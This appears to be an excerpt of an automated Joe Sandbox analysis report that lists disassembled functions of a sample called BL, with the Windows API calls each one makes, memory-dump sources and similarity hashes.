                                                                                                                            • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                            • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                            • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                            Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2832842796-0
                                                                                                                            • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                            • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                            • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                            • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                            Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                            • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1822080540-0
                                                                                                                            • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                            • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                            • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                            • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                            Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 659298297-0
                                                                                                                            • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                            • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                            • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                            • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                            Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                            • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1300944170-0
                                                                                                                            • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                            • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                            • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                            • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                            Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(02ED1BC0,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(02ED1BC0,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 142311417-0
                                                                                                                            • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                            • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                            • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                            • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                            Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0044955A
                                                                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                            • _wcslen.LIBCMT ref: 004495C1
                                                                                                                            • _wcslen.LIBCMT ref: 004495CE
                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1843234404-0
                                                                                                                            • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                            • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                            • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                            • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                            Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                            • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                            • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                            • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                            Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                            • _wcslen.LIBCMT ref: 004457A3
                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3087257052-0
                                                                                                                            • Opcode ID: ea032d5543f557ac077ece0d96b531fddbf9c6873faf10fffc443638d04fe610
                                                                                                                            • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                            • Opcode Fuzzy Hash: ea032d5543f557ac077ece0d96b531fddbf9c6873faf10fffc443638d04fe610
                                                                                                                            • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                            Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                            • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                            • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4156661090-0
                                                                                                                            • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                            • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                            • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                            • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                            Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                            • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 245547762-0
                                                                                                                            • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                            • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                            • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                            • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                            Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                            • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2338827641-0
                                                                                                                            • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                            • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                            • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                            • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                            Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2875609808-0
                                                                                                                            • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                            • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                            • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                            • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                            Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                            • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$DestroyIcon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3419509030-0
                                                                                                                            • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                            • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                            • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                            • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                            Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 004175AE
                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                            • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                            • __lock.LIBCMT ref: 004175DE
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                            • InterlockedIncrement.KERNEL32(02ED2D80), ref: 00417626
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4271482742-0
